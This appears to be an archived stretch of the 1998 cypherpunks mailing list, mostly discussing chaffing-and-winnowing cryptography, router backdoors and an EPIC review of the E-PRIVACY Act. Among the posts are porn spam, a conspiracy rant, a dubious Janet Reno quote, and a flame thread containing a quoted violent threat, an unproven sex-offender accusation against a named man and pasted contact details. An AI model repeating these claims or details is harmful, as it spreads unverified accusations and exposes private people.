 Send payment to:             Bruce Nichols
                                     2155 Verdugo Blvd.
                                           #522
                                    Montrose, Ca 91020
                        
Your Name ___________________________________________ Date ____________

Address ______________________________________________________________

City ____________________________ State __________ Zip Code ______________

Phone#  _____________________ E-mail Address ___________________________

Do you have an IBM (   ) or MAC (   )?  CD rom (   ) or Disks (   )?

(   ) Virtual Girdfriend or (   ) Boyfriend for $10.00 (   ) *both just $15.95

(   ) The Search for Paradise and Club Celebrity X for $19.95

(   ) Everything!!! The Search for Paradise, Club Celebrity X,
      Virtual Girlfriend and Virtual Boyfriend.  
       >>>>All for just $24.95<<<<
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: christine_leeds@yahoo.com
Date: Mon, 11 May 1998 09:28:58 -0700 (PDT)
Subject: Surprise
Message-ID: <B0000235020@emerald.axnet.com>
MIME-Version: 1.0
Content-Type: text/plain



See Celebrity Hardcore pictures & MPEG video movies right from your browser 

      http://151.196.207.83
   
Top Celebrities & supermodels caught in the act

     http://151.196.207.83
          
  Plus Nude Pictures of the hottest naked female fitness models
 Featuring nude photos of Kiana Tom & Cory Everson plus 26 other top fitness models fully naked.

              Visit http://151.196.207.83 Today!
              
               New Attractions added weekly!

  My apologies if this message is of no interest to you. Your name was selected from a list stating that you are interested in adult entertainment. If you wish to recieve no further mailings just reply to this message with REMOVE as the subject.

                           Thank You

                                 Christine Leeds - http://151.196.207.83









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 11 May 1998 11:55:48 -0700 (PDT)
To: "Mordechai Ovits" <jcea@argo.es>
Subject: Re: Chaffing & winnowing without overhead
In-Reply-To: <35571323.D109A0D2@argo.es>
Message-ID: <3.0.5.32.19980511115153.00941970@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Jess Cea Avin wrote:
>> You can have chaffing & winnowing without bandwidth overhead, but the
>> resulting scheme hasn't the original "elegance" anymore. In particular,
>> you don't send the plaintext on the clear.
...
>> b) Calculate the signature for:
>>    [sequence]0  ->  MAC0
>>    [sequence]1  ->  MAC1
>> c) Compare both MACs and locate the first "different" bit,
>>    from high to low bit or viceversa.
>> d) Send that bit from MAC0 if you want to send a "0" or from
>>    MAC1 if you want to send a "1".

So why not _send_ the plaintext in the clear?
Send the 0 bit, and the bit from the MAC0, and the 1 and the MAC1 bit
	0 0, 1 1, 0 1, 1 0, 
Yes, it's expanding the data 4:1, but that's much better than before.

At 12:04 PM 5/11/98 -0400, Mordechai Ovits wrote:
>On the contrary, it has an elegance all it's own :-).

I strongly agree.  I had proposed using a short checksum,
e.g. 8 bits of the MAC, which does leave collisions every ~256 sets,
but this is almost as short a checksum as you can get,
and eliminates the collision except every ~2**64 pairs.

>However clever this technique is (and it *is* clever), 
>it defeats the original purpose of Ron's idea.  

If you do include the data bits, you maintain (very marginally)
the letter of the requirement here.  What you do lose
with this method is the ability to mix traffic from different people;
1 bit of MAC just isn't enough to pick out your own bits.
Any short MAC limits the amount of mixing you can do;
an 8-bit MAC lets you mix a bit without too many collisions,
and a 64-bit MAC should be enough for any mixture you'd
ever bother with (probably 16 or 32 would as well,
though especially for 16 you'd still need a longitudinal
checksum or some method of handling rare collisions.)

Is it close enough for government work?  Probably.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mordechai Ovits" <movits@syndata.com>
Date: Mon, 11 May 1998 09:08:09 -0700 (PDT)
To: "Jess Cea Avin" <jcea@argo.es>
Subject: Re: Chaffing & winnowing without overhead
In-Reply-To: <35571323.D109A0D2@argo.es>
Message-ID: <35572194.51CDC872@syndata.com>
MIME-Version: 1.0
Content-Type: text/plain


Jess Cea Avin wrote:
> 
> You can have chaffing & winnowing without bandwidth overhead, but the
> resulting scheme hasn't the original "elegance" anymore. In particular,
> you don't send the plaintext on the clear.
> 
> The new schema is useful to cypher a document using any standard
> signature library, exportable by definition. Very nice :), since you can
> use, at last, strong crypto :).
> 
> a) When the connection starts, negociate an initial sequence number.
>    The sequence number mustn't be reused. We assume a ordered delivery,
>    like TCP.
> 
> b) Calculate the signature for:
> 
>    [sequence]0  ->  MAC0
> 
>    and
> 
>    [sequence]1  ->  MAC1
> 
> c) Compare both MACs and locate the first "different" bit,
>    from high to low bit or viceversa.
> 
> d) Send that bit from MAC0 if you want to send a "0" or from
>    MAC1 if you want to send a "1".

On the contrary, it has an elegance all it's own :-).
Since this idea has gone through several iterations, starting from Ron's original paper, I wanted to
summarize in one place Jesus Cea Avion's idea.  All credit for the following technique goes to him.

Alice does this:
Mreal = MAC(serial number, message bit, key)
Mfake = MAC(serial number, complement of message bit, key)
In english:  She MACs both the bit she means, and then MACs the bit she does NOT mean.  She then compares
the two MACs to find the first different bit.  Then she sends to Bob the bit from Mreal in the position of
difference.

When Bob gets the bit, he does this:
Ma = MAC(serial number, 0, key)
Mb = MAC(serial number, 1, key)
He then compares Ma to Mb and finds the first difference.  The bit in the position of difference is the one
that was sent to him by Alice.  He then knows whether Ma or Mb is correct.  If Ma is the correct one then
the plaintext bit is 0, if Mb is the correct one then the plaintext bit is 1.
Remember that there is no need to send the serial number, but you MUST use it in the MAC.  If you are using
a reliable protocol like TCP, or storing it in a file, the serial number is implied by the order it was
received/stored.

However clever this technique is (and it *is* clever), it defeats the original purpose of Ron's idea.  The
original reason Ron created chaffing and winnowing was to show that encryption laws are useless.  He
demonstrated that you can use authentication technologies to create privacy.  Even more, even if the
government demands that the plaintext be in the open, his original paper was set up to pass even that
egregious requirement.  Think of what the govenrnment would see with this latest chaffing and winnowing. 
Two people are send a bitstream that is unreadable without a secret key.  No plaintext is visible.  In
fact, it bears very little resemblance to the name "chaffing and winnowing."  It would not matter to them
wether you were using DES, IDEA, or C&W.  If it looks like a duck, walks like a duck, and quacks like a
duck...
Another point of Ron's paper was that any technique the government tried to impose on C&W would create
unacceptable problems.  I dont think these problems would exist in this version of C&W.  Anyone know
better?

-- 
o Mordy Ovits
o Programmer / Cryptographer
o SynData Technologies Inc.
o Download A Free Copy Of Our Software At:
o http://www.syncrypt.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 11 May 1998 14:21:34 -0700 (PDT)
To: jim.moran@mail.house.gov
Subject: David Felton
Message-ID: <355760D6.1E52@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday 5/11/98 1:37 PM

John Young
J Orlin Grabbe

Judge Leroy Hansen has ordered Morales to court [with court reporter] to
answer and probably be sanctioned for taking the 5th on his deposition.

Morales outlined what he planned to do at lunch.

Today I got a CONFIDENTIAL envelope from EEOC Inspector General's
office in Washington.  No doubt a response to my Privacy Act violation
complaint.

Several years ago a Department of Interior whistleblower gave me number
of
book references.  One was a book written by Felton during the Vietnam
era.

Felton's book is only available from the University of New Mexico main
Zimmerman library.

The book was usually checked out when I phoned to ask if it was
available.

The 'black hole' of government we are encountering in the Court system
and
through administrative appeals prompted me to look up a word.

Here is a dictionary definition.

  a political and economic movement, strongly nationalistic, magnifying
the rights
  of the state as opposed to those of the individual, in which industry,
though
  remaining largely under private ownership, and all administrative
political units, 
  are controlled by a strong central government.

When I asked the librarian about Felton's book, the response was usually

	You mean, The Rise of Acid Fascism in America.

I responded, yes.

Full title of Felton's book is seen at 

 
http://www.amazon.com/exec/obidos/quicksearch-query/002-2147604-1106833

I guess what we are seeing with the 'black hole' of the court system and
federal government 
with respect to my Privacy Act violation complaint, the WRITTEN felony
perjury complaint on Sandia lawyer Gregory Cone, the dockets we COULD
not get BEFORE

  http://www.jya.com/whp-10usca.htm 

is that while United States of America is only a democracy in name, 

The US is, in fact, operated as a fascist state by bureaucrats.  

Who go totally insane about the subject of cryptography.
  
Citizens should do something about this.  

Some are. http://www.aci.net/kalliste/ 
          http://www.jya.com/crypto.htm
          http://www.us.net/softwar/
          http://www.antionline.com/
          http://jya.com/whpfiles.htm

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "=?iso-8859-1?Q?Jes=FAs?= Cea =?iso-8859-1?Q?Avi=F3n?=" <jcea@argo.es>
Date: Mon, 11 May 1998 06:04:34 -0700 (PDT)
To: cert-es@listserv.rediris.es
Subject: Chaffing & winnowing without overhead
Message-ID: <35571323.D109A0D2@argo.es>
MIME-Version: 1.0
Content-Type: text/plain


You can have chaffing & winnowing without bandwidth overhead, but the
resulting scheme hasn't the original "elegance" anymore. In particular,
you don't send the plaintext on the clear.

The new schema is useful to cypher a document using any standard
signature library, exportable by definition. Very nice :), since you can
use, at last, strong crypto :).

a) When the connection starts, negociate an initial sequence number.
   The sequence number mustn't be reused. We assume a ordered delivery,
   like TCP.

b) Calculate the signature for:

   [sequence]0  ->  MAC0
   
   and

   [sequence]1  ->  MAC1

c) Compare both MACs and locate the first "different" bit,
   from high to low bit or viceversa.

d) Send that bit from MAC0 if you want to send a "0" or from
   MAC1 if you want to send a "1".

-- 
Jesus Cea Avion                         _/_/      _/_/_/        _/_/_/
jcea@argo.es http://www.argo.es/~jcea/ _/_/    _/_/  _/_/    _/_/  _/_/
                                      _/_/    _/_/          _/_/_/_/_/
PGP Key Available at KeyServ   _/_/  _/_/    _/_/          _/_/  _/_/
"Things are not so easy"      _/_/  _/_/    _/_/  _/_/    _/_/  _/_/
"My name is Dump, Core Dump"   _/_/_/        _/_/_/      _/_/  _/_/
"El amor es poner tu felicidad en la felicidad de otro" - Leibnitz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mordechai Ovits" <movits@syndata.com>
Date: Mon, 11 May 1998 12:10:06 -0700 (PDT)
To: "Jess Cea Avin" <jcea@argo.es>
Subject: Re: Chaffing & winnowing without overhead
In-Reply-To: <35571323.D109A0D2@argo.es>
Message-ID: <35574C41.816CA545@syndata.com>
MIME-Version: 1.0
Content-Type: text/plain


Jess Cea Avin wrote:

> In the Rivest's paper you transmit, indeed, all the 2^n plaintexts for a
> n bit length };-).

Not so. In his paper (before the package tranform stuff), he had the following expansion.
Assuming a 32 bit serial number and a 160 bit MAC, n bits would expand to 388n.
This is because Ron is sending it out like this:
quote from http://theory.lcs.mit.edu/~rivest/chaffing.txt
>To make this clearer with an example, note that the adversary 
>will see triples of the form:
>        (1,0,351216)
>        (1,1,895634)
>        (2,0,452412)
>        (2,1,534981)
>        (3,0,639723)
>        (3,1,905344)
>        (4,0,321329)
>        (4,1,978823)
>        ...
>and so on.

Every bit is getting 2 32-bit serial numbers, its own complement, and 2 160-bit MACs.
a 10KB file would explode into a 3.789MB file.
Not too practical, eh? :-)
-- 
o Mordy Ovits
o Programmer / Cryptographer
o SynData Technologies Inc.
o Download A Free Copy Of Our Software At:
o http://www.syncrypt.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Mon, 11 May 1998 13:41:30 -0700 (PDT)
To: Mordechai Ovits <movits@syndata.com>
Subject: Re: Chaffing & winnowing without overhead
In-Reply-To: <35574C41.816CA545@syndata.com>
Message-ID: <Pine.GSO.3.96.980511163424.41C-100000@pawn.michonline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 May 1998, Mordechai Ovits wrote:

> > In the Rivest's paper you transmit, indeed, all the 2^n plaintexts for a
> > n bit length };-).
> 
> Not so. In his paper (before the package tranform stuff), he had the following expansion.

Note that any of the 2^n plaintexts cna be reconstructed from the
following sequence of triples.  (Assuming no knowledge of the MAC.  The
attacker has no idea which of each pair of triples related to each
sequence is correct, so he must search every possibility, which turns  out
to be each of the 2^n plaintexts.)

> Assuming a 32 bit serial number and a 160 bit MAC, n bits would expand to 388n.
> This is because Ron is sending it out like this:
> quote from http://theory.lcs.mit.edu/~rivest/chaffing.txt
> >To make this clearer with an example, note that the adversary 
> >will see triples of the form:
> >        (1,0,351216)
> >        (1,1,895634)
> >        (2,0,452412)
> >        (2,1,534981)
> >        (3,0,639723)
> >        (3,1,905344)
> >        (4,0,321329)
> >        (4,1,978823)



Ryan Anderson 
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: die@die.com
Date: Mon, 11 May 1998 13:55:42 -0700 (PDT)
To: Sunder <sunder@brainlink.com>
Subject: Re: [Fwd: 3Com switches - undocumented access level.]
In-Reply-To: <Pine.BSF.3.91.980509032901.17424A-100000@mcfeely.bsfs.org>
Message-ID: <19980511165629.B17830@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, May 11, 1998 at 10:50:17AM -0400, Sunder wrote:
> Dave Emery wrote:
> 
> >         This is not that uncommon.   We implemented such a backdoor in a
> > router I worked on the design of some years ago.   The magic password
> > was a function of the model and serial number of the machine (not as I
> > remember a very strong hash either), and different for all boxes.  We
> > (or rather the marketing and support people) felt that leaving a
> > customer who forgot his password with no option but reset the router to
> > its factory defaults was more undesirable than providing a potential
> > attack point for  sophisticated hackers and spooks 
> 
> This is still unexcusable.  It would have been just as simple to include a
> hidden reset switch in a pannel somewhere that would zap all the passwords
> on the router without zapping the config, and maybe send some alarms out
> via SNMP incase it wasn't something that was wanted.

	It took a great deal of earnest debate to get any kind of reset
switch implemented at all - they cost some amount of money and room in
the box, and there were those who held that having a switch there could
invite nervous diddlers to reset the machine causing a crash.   So having
several was harder to sell.  We eventually settled on two, one which would
reset to defaults when pressed at the same time as the other which simply
rebooted.   The need to reset a box whose configuration was terminally 
screwed up to factory defaults was acutely felt by the support people, 
who had to pay a lot to swap out or service onsite a box that someone had
misconfigured so it wouldn't talk to its serial ports (which was
unfortunately possible).

	I don't think those of us who were not happy with the backdoor
would have been much happier with a switch that just magicly reset
passwords, since that would have allowed someone with a moments
unguarded physical access to the box in a wiring closet somewhere to get
in (perhaps hours later from a safe haven via the network) without
necessarily causing a  disruption that might be noticed and investigated
(and not everyone back then had reliable SNMP management and alarms
running).  The solution we chose forced someone with that kind of
transient physical accesss to completely take the machine off line for
minutes or hours while restoring the configuration which was much
likelier to be observed (and required the intruder know the old
configuration in the first place).  We felt this made our reset switches
less of a hazard from 30 second quicky attacks - attacks much easier
to pull off than having enough time connected to the box on a terminal
or laptop to restore the old configuration. 

> 
> 
> >         I suspect that a large fraction of alarms, security systems,
> > pbxs and the like incorperate such backdoors for precisely the same
> > kinds of reasons - it is simply too catastrophic to reset everything
> > if someone forgets the password.   I know several commercial Unixes
> > had such backdoors in them for emergency access years ago, and wouldn't
> > be overwhelmingly surprised if some current OS's still have magic backdoors.
> 
> That doesn't mean that the ankle biters won't find them.  For example, I could
> put a sniffer on the network coming into the router and call up tech support
> and say "Hi" I lost my password, here's my IP address, help, help.
> 
	No doubt.   Generally there was some minimal effort to ensure
that the person calling tech support was legit (callbacks, lists of
contact names and so forth) but there is probably little doubt that a
clever social engineer could perhaps have gotten a box password that
way - although there would certainly have been a trail left that could
have been followed.   For the paraniod we encouraged use of dial up
modems on the console port rather than network access.


> I can then do the same thing a week later with the same router incase the
> hash is time dependant, and then later with another router with a different
> serial number, and I'll have much info to get started on how your hash works.
> 
> Piece of cake.
> 
	Calling up for emergency help with lost passwords was
fortunately not a very common occurance, and generally was noted and
investigated. While our hash wasn't wonderful, I don't think it would
have been easy to obtain enough password/router pairs by calling tech
support to break it that way.  Would have been much easier to obtain a box
and disassemble the code.   And that would have left no trail.


-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "=?iso-8859-1?Q?Jes=FAs?= Cea =?iso-8859-1?Q?Avi=F3n?=" <jcea@argo.es>
Date: Mon, 11 May 1998 10:57:18 -0700 (PDT)
To: Mordechai Ovits <movits@syndata.com>
Subject: Re: Chaffing & winnowing without overhead
In-Reply-To: <35571323.D109A0D2@argo.es>
Message-ID: <3557576A.C5EF9791@argo.es>
MIME-Version: 1.0
Content-Type: text/plain


> However clever this technique is (and it *is* clever), it defeats the
> original purpose of Ron's idea.

Yes, you are right, Mordechai. My point was:

a) Prove that you can implement chaffing & winnowing without
   bandwidth overhead. I agree that the final schema doesn't
   resemble C&W anymore :).

b) Prove that you can use signature schemes, strong and exportable,
   to achieve confidentiality. In that way, my objetive is the same
   that Rivest had.

I'm happy knowing I can use full strengh signatures to keep my secrets,
secret :)

>  No plaintext is visible.

In the Rivest's paper you transmit, indeed, all the 2^n plaintexts for a
n bit length };-).

-- 
Jesus Cea Avion                         _/_/      _/_/_/        _/_/_/
jcea@argo.es http://www.argo.es/~jcea/ _/_/    _/_/  _/_/    _/_/  _/_/
                                      _/_/    _/_/          _/_/_/_/_/
PGP Key Available at KeyServ   _/_/  _/_/    _/_/          _/_/  _/_/
"Things are not so easy"      _/_/  _/_/    _/_/  _/_/    _/_/  _/_/
"My name is Dump, Core Dump"   _/_/_/        _/_/_/      _/_/  _/_/
"El amor es poner tu felicidad en la felicidad de otro" - Leibnitz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: announce@zdnetmail.com
Date: Tue, 12 May 1998 12:31:26 -0700 (PDT)
To: Squeamish Ossifrage <cypherpunks@toad.com>
Subject: Announcing  ZDNet Mail !!
Message-ID: <199805121931.MAA11036@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Announcing ZDNet Mail - the best free email on the Web!

ZDNet is pleased to announce the launch of ZDNet Mail, the
best free email on the Web.  Because you're a valued
member of the ZDNet community,  we're providing you with
a free, secure,  email account, that you can access from any
Internet connection, anytime or anywhere.

As a current ZDNet member, your email account is already
set up -- you can start using it today! Just log on to ZDNet Mail at:

http://www.zdnetmail.com

and enter your current ZDNet user name and password
as shown below:

User Name: cypherpunks
Password: cypherpunks

and you'll find a Welcome letter with all the information you'll
need to take start using your new account. ZDNet Mail gives you
easy access, security, and a permanent address (even if
you change ISPs). It's everything you need in an email account
and it's all provided free of charge. Just click below to
get started!

http://www.zdnetmail.com


The ZDNet Mail Team




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 12 May 1998 11:54:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Clinton's NWO
Message-ID: <355897EF.CB6@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Clinton just had to announce Global Law while I was reading:
http://www.nebonet.com/headhome/dadmisc/trojan.htm

I suspect Clinton's speech in regard to nations co-operating in 
making their citizens subject to deportation to face charges in
foreign countries was designed to keep me from fleeing my 
'Dog At Large' charges in Bienfait.
Seiing as how the Queen's Gestapo was wearing Keblar when they
upped the ante for charge to four years in prison, I guess I must
be a desperate ASCII character.

Toto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 12 May 1998 06:08:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Gary Lee Burnore is a Convicted Sex Offender in Raleigh, NC
In-Reply-To: <199805101850.LAA00114@sirius.infonex.com>
Message-ID: <199805121307.PAA21528@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Steve Crisp <crisp@pageplanet.com> wrote:

> Hate to tell you this, bucko, but he in no longer listed in the registry
> since Gary is not a convicted sex offender and therefore not subject to
> NC registration.

Now explain how whining to have Gary Lee Burnore's entry removed from the
NC registered sex offenders website makes the underlying offense go away?
I'm sure the victim feels better, right?  And Gary's neighbors can now rest
easier knowing that the sex offender in their neighborhood is no longer
registered.

Sorry, but removing the entry does not alter the fact that Gary Lee Burnore
is still a convicted sex offender -- just an unregistered one.

> Now, why don't you come out of hiding so we can track you down and beat
                                                                     ^^^^
> the living fuck out of you?
     
I hate to tell you this, little Burnorian groupie, but you misspelled
"suck".  And who is this "we" you speak of?  The management of Page Planet?
What are you going to do?  Put on your white sheets and burn a cross on
my lawn?

It's people like you and Gary Burnore who threaten and harass people who
say things you don't like that make anonymous remailers necessary.
Otherwise only loudmouth bullies like you would have any freedom of speech.
Thank you for proving that point with your threatening post.

   PagePlanet (PAGEPLANET-DOM)
   3252 Octavia Street
   Raleigh, NC 27606
   US

   Domain Name: PAGEPLANET.COM

   Administrative Contact:
      Crisp, Steve  (SC2795)  crisp@PAGEPLANET.COM
      919-852-5262 (FAX) 919-233-0816
   Technical Contact, Zone Contact:
      Sullivan, Mikey  (MS5652)  mikey@PAGEPLANET.COM
      919-852-5262 (FAX) 919-852-5261
   Billing Contact:
      Crisp, Valerie  (VC370)  valerie@PAGEPLANET.COM
      919-233-6602 (FAX) 919-852-5261





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Tue, 12 May 1998 12:56:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Nobody's Home!
Message-ID: <6122829a.3558a938@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I got only 1 anon. comment worth responding to -
=====
Subj:	 
Date:	5/12/98 2:41:44 PM Central Daylight Time
From:	nobody@nsm.htp.org
To:	stansqncrs@aol.com

"A cultist is one who has a strong belief in the Bible and the Second
Coming of Christ; who frequently attends Bible studies; who has a high
level of financial giving to a Christian cause; who home schools for
their children; who has accumulated survival foods and has a strong
belief in the Second Amendment; and who distrusts big government.  Any
of these may qualify [a person as a cultist] but certainly more than one
[of these] would cause us to look at this person as a threat, and his
family as being in a risk situation that qualified for government
interference."
-Attorney General Janet Reno, Interview on 60 Minutes, June 26, 1994
=====
"One man's religion is another man's cult" - me

Stan,
The 'Wall of Reality'
http/members.aol.com/RealityWal/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mordechai Ovits" <movits@syndata.com>
Date: Tue, 12 May 1998 13:14:04 -0700 (PDT)
To: Ryan Anderson <ryan@michonline.com>
Subject: Re: Chaffing & winnowing without overhead
In-Reply-To: <Pine.GSO.3.96.980511163424.41C-100000@pawn.michonline.com>
Message-ID: <3558ACB7.678309E7@syndata.com>
MIME-Version: 1.0
Content-Type: text/plain


Ryan Anderson wrote:

> Note that any of the 2^n plaintexts cna be reconstructed from the
> following sequence of triples.  (Assuming no knowledge of the MAC.  The
> attacker has no idea which of each pair of triples related to each
> sequence is correct, so he must search every possibility, which turns  out
> to be each of the 2^n plaintexts.)

OK, but to be technically correct, you arent *transmitting* all 2^n
possibilities.  That would be like saying that when you blowfish encrypt a
64-bit block and send it, you are sending all 2^64 plaintext, because given
all 2^128 possible keys you will cover the entire "plaintext-space".  while
it is crucial to make sure that you leave the possible decryptions
exponential, you are not transmitting all possible plaintests. That would
be .... uhhh... bad.
-- 
o Mordy Ovits
o Programmer / Cryptographer
o SynData Technologies Inc.
o Download A Free Copy Of Our Software At:
o http://www.syncrypt.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Tue, 12 May 1998 14:15:24 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: FW: "... would cause us to look at this person as a threat"
Message-ID: <D104150098E6D111B7830000F8D90AE801786D@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain


The earliest online citation I can find is in the  May 1997 Newsletter of
the 
Melbourne Seventh-day Adventist Church, at 

http://www.spacey.net/bwillard/News0597.html 

Considering it's content, I have no doubt that it is manufactured - it
carefully written to offend millenialist Christians, such as the SDAs.
I've written the page owner to see if I can find out more.

Deja News shows this quote first in alt.war.civil.usa, on March 18 1998.
Since then, it's been banging around various Christian and political
groups. 

It also seems to be on the website 
http://www.sightings.com/political/renowords.htm, but I have not
confirmed this, nor can I tell if this cites an earlier source.

Peter Trei

> -----Original Message-----
> From:	Tim May [SMTP:tcmay@got.net]
> Sent:	Tuesday, May 12, 1998 2:45 PM
> To:	cypherpunks@cyberpass.net
> Subject:	"... would cause us to look at this person as a threat"
> 
> 
> 
> I just saw this on one of the newsgroups:
> 
> 
> "A cultist is one who has a strong belief in the Bible and the Second
> Coming of Christ; who frequently attends Bible studies; who has a high
> level of financial giving to a Christian cause; who home schools for
> their children; who has accumulated survival foods and has a strong
> belief in the Second Amendment; and who distrusts big government.  Any
> of these may qualify [a person as a cultist] but certainly more than one
> [of these] would cause us to look at this person as a threat, and his
> family as being in a risk situation that qualified for government
> interference."
> -Attorney General Janet Reno, Interview on 60 Minutes, June 26, 1994
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Banisar <banisar@epic.org>
Date: Tue, 12 May 1998 14:57:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: EPIC Analysis of E-Privacy Act
Message-ID: <v04003a01b17e767f819d@[204.91.138.45]>
MIME-Version: 1.0
Content-Type: text/plain


====================================================================

            EPIC Preliminary Analysis of E-PRIVACY Act
                           May 12, 1998
                          Washington, DC


Senators John Ashcroft (R-MO) and Patrick Leahy (D-VT) today
introduced the "Encryption Protects the Rights of Individuals from
Violation and Abuse in Cyberspace (E-PRIVACY) Act."  The proposed
legislation is the latest in a series of congressional measures
designed to resolve the debate surrounding current U.S. encryption
policy.  Like the SAFE Act (H.R. 695) now pending in the House,
the E-PRIVACY Act seeks to relax existing controls on the export
of encryption products.  Controls would be lifted for encryption
products that are deemed to be "generally available" within the
international market.  Exporters would be given new procedural
rights to obtain expedited determinations on the exportability of
their products.

The bill also contains several provisions that would preserve the
right of Americans to use encryption techniques and that would
enhance the privacy protections currently accorded to personal
communications and stored data.  Among its positive features, the
bill:

* Reiterates the right of Americans to use, develop, manufacture,
sell, distribute, or import any encryption product, regardless of
the algorithm selected, key length, or the existence of key
recovery capabilities;

* Prohibits government-compelled key escrow or key recovery;

* Prohibits government agencies from creating any linkage between
cryptographic methods used for authentication and those used for
confidentiality;

* Prohibits the federal government from purchasing key recovery
encryption systems that are not interoperable with other
commercial encryption products; and

* Provides enhanced privacy protections for stored electronic data
held by third parties, location information generated by wireless
communications services, and transactional information obtained
from pen registers and trap and trace devices;

The bill contains two provisions that raise significant civil
liberties and privacy concerns.

The Criminalization Provision

The bill would make the use of encryption to conceal
"incriminating" communications or information during the
commission of a crime a new and independent criminal offense.

While well-intended, the provision could have several unintended
consequences that would easily undermine the other desirable
features of the bill.

We believe it is a mistake to create criminal penalties for the
use of a particular technique or device. Such a provision tends to
draw attention away from the underlying criminal act and casts a
shadow over a valuable technology that should not be criminalized.
It may, for instance, be the case that a typewritten ransom note
poses a more difficult challenge for forensic investigators than a
handwritten note. But it would be a mistake to criminalize the use
of a typewriter simply because it could make it more difficult to
investigate crime in some circumstances.

Additionally, a provision which criminalizes the use of
encryption, even in furtherance of a crime, would give prosecutors
wide latitude to investigate activity where the only indicia of
criminal conduct may be the mere presence of encrypted data. In
the digital age, where techniques to protect privacy and security
will be widely deployed, we cannot afford to view encryption as
the potential instrumentality of a crime, just as we would not
today view the use of a typewriter with suspicion.

Finally, the provision could also operate as a substantial
disincentive to the widespread adoption of strong encryption
techniques in the communications infrastructure. Given that the
availability of strong encryption is one of the best ways to
reduce the risk of crime and to promote public safety, the
retention of this provision in the legislation will send a mixed
message to users and businesses -- that we want people to be free
to use encryption but will be suspicious when it is used.

If the concern is that encryption techniques may be used to
obstruct access to evidence relevant to criminal investigations,
we submit that the better approach may be to rely on other
provisions in the federal and state criminal codes (including
sections relating to obstruction of justice or concealment) to
address this problem if it arises.

The "NET Center"

The bill creates within the Department of Justice a National
Electronic Technology Center (NET Center) to "serve as a center
for . . . law enforcement authorities for information and
assistance regarding decryption and other access requirements."

The NET Center would have a broad mandate and could spawn a new
domestic surveillance bureaucracy within the Department of
Justice.  Among other powers, the bill authorizes the NET Center
to:

* Examine encryption techniques and methods to facilitate the
ability of law enforcement to gain efficient access to plaintext
of communications and electronic information;

* Conduct research to develop efficient methods, and improve the
efficiency of existing methods, of accessing plaintext of
communications and electronic information;

* Investigate and research new and emerging techniques and
technologies to facilitate access to communications and electronic
information; and

* Obtain information regarding the most current hardware,
software, telecommunications, and other capabilities to understand
how to access digitized information transmitted across networks.

The mission of the NET Center is made more troubling by the bill's
authorization of "assistance" from other federal agencies,
including the detailing of personnel to the new entity.  In light
of the fact that existing federal expertise in the areas of
electronic surveillance and decryption resides at the National
Security Agency (NSA), the bill in effect authorizes unprecedented
NSA involvement in domestic law enforcement activities.  Such a
result would be contrary to a half-century-old consensus that
intelligence agencies must be strictly constrained from engaging
in domestic "police functions."

That consensus arose from the recognition that intelligence
agencies created to operate abroad are ill-suited for domestic
activities, where U.S. citizens enjoy constitutional protections
against governmental intrusions.  In 1975, Sen. Frank Church led a
congressional investigation into the activities of NSA.  He noted
that Congress had a "particular obligation to examine the NSA, in
light of its tremendous potential for abuse. ... The danger lies
in the ability of NSA to turn its awesome technology against
domestic communications."

In 1987, Congress enacted the Computer Security Act, which sought
to vest civilian computer security authority in the Commerce
Department and to limit the domestic role of NSA.  The House
Report on the Computer Security Act cited congressional concern
over a Reagan Administration directive that "gave NSA the
authority to use its considerable foreign intelligence expertise
within this country."  The report noted that such authority was
"particularly troubling" since NSA "has, on occasion, improperly
targeted American citizens for surveillance."

The NET Center proposal, if approved, would constitute a
fundamental re-definition of the relationship between intelligence
agencies and domestic law enforcement.  Such an approach would
ignore 50 years of experience and would pose a serious threat to
the privacy and constitutional rights of Americans.

EPIC looks forward to working with the legislation's sponsors and
other interested parties to address these issues and develop a
national encryption policy that will ensure the widespread
availability of robust encryption products and the preservation of
constitutional rights.  Such a result will be critical for both
